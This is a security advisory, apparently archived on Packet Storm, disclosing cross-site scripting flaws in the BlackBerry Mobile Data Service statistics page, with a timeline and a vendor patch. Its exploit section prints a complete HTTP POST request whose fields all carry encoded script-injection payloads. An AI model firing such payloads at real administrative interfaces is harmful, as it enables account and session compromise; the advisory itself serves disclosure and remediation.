what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Blackberry Mobile Data Service XSS

Blackberry Mobile Data Service XSS
Posted Apr 17, 2009
Authored by Michael Thumann

The Blackberry Mobile Data Service Connection is vulnerable to several cross site scripting attacks in the "Customize Statistics Page". All versions prior to 4.1.6 MR4 are vulnerable.

tags | exploit, xss
SHA-256 | 32a645ba20821c711d9b5be04daab2fb1198f6b02eca86a871e10c9d321e5366

Blackberry Mobile Data Service XSS

Change Mirror Download
ERNW Security Advisory 01-2009

XSS in Blackberries Mobile Data Service Connection Service

Author: Michael Thumann <mthumann[at]ernw.de>

1. Summary
The Blackberry Mobile Data Service Connection is vulnerable to
several XSS attacks in the "Customize Statistics Page".

2. CVSS V2 Base Score : 3.5 (based on vendor rating)

3. Products affected
Blackberry Enterprise Server: all versions prior to 4.1.6 MR4

4. Patch Availability : A patch is available from the vendor.

5. Details
Injecting scripts (containing standard and encoded XSS attacks) into
all the fields of the "customize statitics page" reveals that none
of the fields are properly validated for malicious input and the
output isn't sanitized.

6. Solution
Update the affected products to the actual version.

7. Time-Line
16 Feb 2009: Discovery of the vulnerability
02 Mar 2009: Vulnerability reported to vendor
02 Mar 2009: Answer from vendor
16 Apr 2009: Patch available
16 Apr 2009: Public Disclosure

8. Exploit
POST /admin/statistics/ConfigureStatistics HTTP/1.0
Cookie: JSESSIONID=....
Content-Length: 753
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: ...
Content-Type: application/x-www-form-urlencoded
Referer: http://x:8080/admin/statistics/ConfigureStatistics

customDate=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
interval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
lastCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E
&lastIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%
3E&nextCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript
%3E&nextIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%
2Fscript%3E&action=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E
&delIntervalIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
addStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
delStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
referenceTime=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E

9. Thanks
We would like to thank the guys from Blackberry for working
together on this issue in a professional and responsible way.

10. Disclaimer
The informations in this advisory are provided "AS IS"
without warranty of any kind. In no event shall the authors be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages due to the
misuse of any information provided in this advisory.

Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    9 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close